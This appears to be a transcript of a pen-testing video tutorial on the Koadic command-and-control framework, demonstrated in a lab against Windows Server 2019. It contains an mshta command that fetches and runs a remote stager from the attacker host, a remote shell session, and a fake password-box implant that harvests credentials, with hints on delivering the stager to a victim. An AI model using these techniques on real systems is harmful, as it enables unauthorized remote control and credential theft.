Hey, what's up guys? Welcome back to another video. So this video is going to be pretty cool. So we're going to be talking about a tool called Koadic. Koadic is a tool to control another computer. So if you're on a pen test and you want to use something like Cobalt Strike, Metasploit, all these kind of C2 frameworks, this is just another one to add to your arsenal. So if you guys are new to the channel, please like, subscribe, and share. If you're coming back for more, thank you so much. And make sure you watch till the end so you can see all the cool things you can do with this tool. So I really enjoyed it. I discovered it not too long ago, and I did it on an engagement. I used it on an engagement, and I love it. So let me just open up a few things on my end over here to make sure my machine is good. All right, so here we have the tool. You can go to kali.org and check it out, or just Google it. And you can also download it right from GitHub. You know, if you don't have Kali or anything like that, but it's built into Kali, so we're good here. So what we're going to do here is utilize this tool. So it's a Windows post-exploitation rootkit. It's similar to other penetration tools such as Interpreter and PowerShell Empire. If you guys use these tools, you know, you should be very familiar with this tool once you get the hang of it, right? So it's a Windows tool. You know, it works on Windows hosts. And aka, you know, JScript, Java, and VB script. So pretty much what we're going to do here is just set up a stager. Once we get that stager set up, we can upload this to our Windows machine. And in my case, what we're going to be using today is a Windows Server 2019. So you can see it here. I just booted it up, so it is up and running. So I'm running a domain controller over here. I'm logged in as administrator. And we have all this bells and whistles and, you know, blah, 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 lab.com. You know, I just set up this domain for this video. All right, so it's very easy. If you want to learn how to set up domains and Active Directory and Windows stuff, I have a whole playlist on that. Check that out on my channel. But that's not for today's topic. So now what we're going to do is just open up a terminal. So let's go open up a terminal. And let's give this a second to boot up. All right, so now we can just make this bigger, and I'm just going to go ahead and log into my fancy user. Okay, so now what we're going to do here is just run the tool Koadic. So if we just run the tool Koadic and hit enter, we see the tool here. So by default, it's at the stager JS MS HTA. We're going to use that. So say, for example, if you're not there, how do you get there? What you can do is just use, we can type the word use, stager, and then, for example, if we hit tab, we can see JS, and then if we hit tab again, we can see all the options, bits admin, disk, MSHTA, redserve, etc. Right? So, and today we're going to use MSHTA, so we can send the stager off to the other machine, so we can get remote access. All right, so I'm just going to stay default because I'm already there, as you can see. So if we just type in options, for an example, we can see the options that we have here. So my, you know, it's pretty much fill in the blanks. It's very simple. So the server host, where is this going to be hosted? It's going to be hosted on my Kali machine. So my Kali machine is at 172.16.1.35. If you want to check and verify, you can open up another tab or open up another terminal or whatever floats your boat. All right, and then we can just do an ifconfig eth0 in my case, and I'm at 172.16.1.35. Okay, so I'm good there. So my service port is 9999. That's totally fine with me. What is not fine with me is this endpoint. This is the URL path for call home operations. So it's going to phone back home into our Kali machine from the victim, right? From the Windows machine. So I want to go ahead and change this up a little bit, right? So I want to go ahead and use set endpoint. And I'm just going to put pat install. Okay. So now if I do options, we can see here by the endpoint, it says pat install. And you're going to see why I did that in a second. Okay. So we can have other stuff here. We can have certificates and all that, but you know, we're not going to go all into that craziness. So what we're going to do now is just go ahead and let's go ahead and just bring this back up. And we're going to go ahead and run this. So now when we run this, we have this waiting for our victim to phone home or to call home, right? So we have ms hta http slash colon slash slash 172.16.1.35 colon 9999 slash pat install. So now what we can do is go back to our Windows machine and run this from there. Okay, so let me go back to my Windows machine. Let me minimize this. Let me go ahead and open up a command shell, because this is from the command shell. So let's be patient for a second, and let's just go ahead and just run this as admin, just so we don't have any hiccups. And if you're asking, okay, how do you send this off to the victim? Think outside the box, and however you want to create something for the victim to run. You can run a batch, a script. You can run, put it into a file that has an executable. There's multiple ways, but this is just going to be the demo just to see the tool in action, right? So let's go ahead and start this. So let's do ms hta, all right? And then it's going to be a http, http 172.16.1.35, and I'm at colon 9999 slash pat install. Whoops, if I can spell. Okay, now if I run this, now if we go back to our Kali machine, let me go ahead and boot that up. Now we can see that we have a zombie. So we can see lab/administrator, that's the user that I'm logged in as on my 2019 box. We can see that it's Windows Server 2019 Data Center Edition. So now we can just put zombies, and we can see that we have one zombie alive, right? So it's at 172.16.1.39. That is my IP address of my Windows Server machine. Okay, so now what can we do with this? Now what we can do is we can interact with this, right? So once we interact with it, we can see everything that's on there, right? So let's go ahead and interact with it, okay? So let's go ahead and just, let's do cmd shell 0, right? Because when it's interact with the zombie 0. So now if I do like an ipconfig, it runs that on that machine. If I do dir, which is directory. So now we'll give this a second. It just takes a minute. And remember, I'm doing this in a lab environment on my laptop, so sometimes patience is key. All right, so now we're pretty much on that machine. Technically, we have full control. We can do a whole bunch of things. So what I'm going to do one more thing, which is pretty cool. We're going to do a fish box, right? So in the beginning, you've seen that there's implants, there's stagers, right? So let's go ahead and exit out of here. And what I want to do is use an implant now. So let's use implant. And if we hit tab, we can see different ones. Fun, gather, inject, blah, blah, blah. Let's do fish. Now if we do tab again, we have a password box, right? So now what is this saying? Let's just do options really quick. And we see here we can do a message and zombies all. Obviously, we're going to just use the zombie that we have, which is zombie 0. But this is going to show a box for the user to enter their password. So say, for example, we're going to go ahead and just say set zombie 0 in my case. And then we're going to go ahead and just hit run, right? And now it went to our Windows box. I'm going to go back to my Windows box. And we have this little fancy box here. It says, you must enter your password to continue. So I'll say, thanks for watching. Okay, enter. And now the user's like, okay, I put my password. Now and we can X out of here. Look, we can close this out. We can start browsing around. And that does not kill our session, right? So now we see here, thanks for watching. We still have full control. We do zombies. We still have that zombie alive. So we are good, right? So this is an awesome tool. Just play around with it. There's a million different kinds of things to do it here. We can do hash dumps. We can do secret dumps. We can do so many things. But I want to keep this high level, a sweet and simple video. So hopefully this is informative for you guys. If you have any questions, just let me know in the comments below. And if you found this video informative, please like, subscribe, and share. I really, appreciate all the support. This is a fun journey for me, like I always say. And if you guys want to ever come live, if you're in InfoSec or in IT, I'm doing one live a week. with different industry professionals. So if you want to come on the channel, just hit me up. We can set up a little chat to see what you're about, what you want to talk about, and get the exposure and start networking. So thank you so much for viewing, and until next time, have an awesome day, guys.